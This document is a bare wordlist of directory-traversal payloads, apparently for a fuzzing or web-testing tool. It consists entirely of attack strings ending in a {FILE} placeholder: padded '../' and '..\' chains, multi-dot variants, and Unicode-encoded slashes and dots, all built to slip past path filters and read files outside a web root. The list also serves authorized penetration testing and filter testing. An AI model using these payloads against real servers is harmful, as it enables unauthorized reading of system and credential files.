-/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../../{FILE} -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\{FILE} -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\{FILE} -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\{FILE} -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\{FILE} -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\{FILE} -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\{FILE} -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\{FILE} -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\..\{FILE} -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../{FILE} -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../{FILE} -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../{FILE} -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../{FILE} -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../{FILE} -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../{FILE} -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../{FILE} -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../../{FILE} -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\{FILE} -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\{FILE} -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\{FILE} -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\{FILE} -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\{FILE} -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\{FILE} -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\{FILE} -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\..\{FILE} -/.../{FILE} -/.../.../{FILE} -/.../.../.../{FILE} -/.../.../.../.../{FILE} -/.../.../.../.../.../{FILE} -/.../.../.../.../.../.../{FILE} -/.../.../.../.../.../.../.../{FILE} -/.../.../.../.../.../.../.../.../{FILE} -/...\{FILE} -/...\...\{FILE} -/...\...\...\{FILE} -/...\...\...\...\{FILE} -/...\...\...\...\...\{FILE} -/...\...\...\...\...\...\{FILE} -/...\...\...\...\...\...\...\{FILE} -/...\...\...\...\...\...\...\...\{FILE} -/..../{FILE} -/..../..../{FILE} -/..../..../..../{FILE} -/..../..../..../..../{FILE} -/..../..../..../..../..../{FILE} -/..../..../..../..../..../..../{FILE} -/..../..../..../..../..../..../..../{FILE} -/..../..../..../..../..../..../..../..../{FILE} -/....\{FILE} -/....\....\{FILE} -/....\....\....\{FILE} -/....\....\....\....\{FILE} -/....\....\....\....\....\{FILE} -/....\....\....\....\....\....\{FILE} -/....\....\....\....\....\....\....\{FILE} -/....\....\....\....\....\....\....\....\{FILE} -/........................................................................../{FILE} -/........................................................................../../{FILE} -/........................................................................../../../{FILE} -/........................................................................../../../../{FILE} -/........................................................................../../../../../{FILE} -/........................................................................../../../../../../{FILE} -/........................................................................../../../../../../../{FILE} -/........................................................................../../../../../../../../{FILE} -/..........................................................................\{FILE} -/..........................................................................\..\{FILE} -/..........................................................................\..\..\{FILE} -/..........................................................................\..\..\..\{FILE} -/..........................................................................\..\..\..\..\{FILE} -/..........................................................................\..\..\..\..\..\{FILE} -/..........................................................................\..\..\..\..\..\..\{FILE} -/..........................................................................\..\..\..\..\..\..\..\{FILE} -/..%u2215{FILE} -/..%u2215..%u2215{FILE} -/..%u2215..%u2215..%u2215{FILE} -/..%u2215..%u2215..%u2215..%u2215{FILE} -/..%u2215..%u2215..%u2215..%u2215..%u2215{FILE} -/..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE} -/..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE} -/..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE} -/%uff0e%uff0e/{FILE} -/%uff0e%uff0e/%uff0e%uff0e/{FILE} -/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE} -/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE} 